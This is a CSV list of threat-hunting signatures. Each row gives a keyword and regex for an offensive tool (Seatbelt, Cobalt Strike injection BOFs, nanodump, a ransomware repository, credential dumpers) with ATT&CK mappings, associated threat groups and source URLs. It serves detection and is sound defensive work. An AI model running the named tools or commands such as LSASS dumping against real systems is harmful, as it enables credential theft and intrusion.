"*Search your passwords as normal user*",".{0,1000}Search\syour\spasswords\sas\snormal\suser.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58258"
"*search_for_secrets(*",".{0,1000}search_for_secrets\(.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","58259"
"*Search-cpassword*",".{0,1000}Search\-cpassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","58263"
"*Searching for accounts that only support RC4_HMAC*",".{0,1000}Searching\sfor\saccounts\sthat\sonly\ssupport\sRC4_HMAC.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","58264"
"*Searching for master credentials (2/2)*",".{0,1000}Searching\sfor\smaster\scredentials\s\(2\/2\).{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","#content","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","58265"
"*SearchOutlook.exe*",".{0,1000}SearchOutlook\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58266"
"*searchsploit -m *",".{0,1000}searchsploit\s\-m\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","58267"
"*searchsploit -x *",".{0,1000}searchsploit\s\-x\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","58268"
"*searchsploit_rc*",".{0,1000}searchsploit_rc.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","58269"
"*seatbelt -*",".{0,1000}seatbelt\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58270"
"*seatbelt all*",".{0,1000}seatbelt\sall.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58271"
"*Seatbelt* -group=all*",".{0,1000}Seatbelt.{0,1000}\s\-group\=all.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","58272"
"*Seatbelt.Commands.Windows*",".{0,1000}Seatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","58273"
"*Seatbelt.Commands.Windows*",".{0,1000}Seatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Seatbelt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58274"
"*Seatbelt.Commands.Windows*",".{0,1000}Seatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","seatbelt","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Seatbelt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58275"
"*Seatbelt.Commands.Windows*",".{0,1000}Seatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58276"
"*Seatbelt.Commands.Windows.*",".{0,1000}Seatbelt\.Commands\.Windows\..{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","58277"
"*SeatBelt.exe system*",".{0,1000}SeatBelt\.exe\ssystem.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","58278"
"*Seatbelt.exe*",".{0,1000}Seatbelt\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","58279"
"*Seatbelt.exe*",".{0,1000}Seatbelt\.exe.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","58280"
"*Seatbelt.exe*",".{0,1000}Seatbelt\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58281"
"*seatbelt/hostnames.txt*",".{0,1000}seatbelt\/hostnames\.txt.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58282"
"*SeatbeltNet*.exe*",".{0,1000}SeatbeltNet.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","58283"
"*SecDbg/Prince-Ransomware*",".{0,1000}SecDbg\/Prince\-Ransomware.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","1","N/A","N/A","10","","N/A","","","","58284"
"*sec-inject *",".{0,1000}sec\-inject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","0","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","58285"
"*secinject.cna*",".{0,1000}secinject\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","1","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","58286"
"*secinject.git*",".{0,1000}secinject\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","1","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","58287"
"*secinject.x64*",".{0,1000}secinject\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","1","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","58288"
"*secinject.x86*",".{0,1000}secinject\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","1","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","58289"
"*secinject/src*",".{0,1000}secinject\/src.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","1","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","58290"
"*--seclogon-leak-local*",".{0,1000}\-\-seclogon\-leak\-local.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","58291"
"*--seclogon-leak-remote*",".{0,1000}\-\-seclogon\-leak\-remote.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","58292"
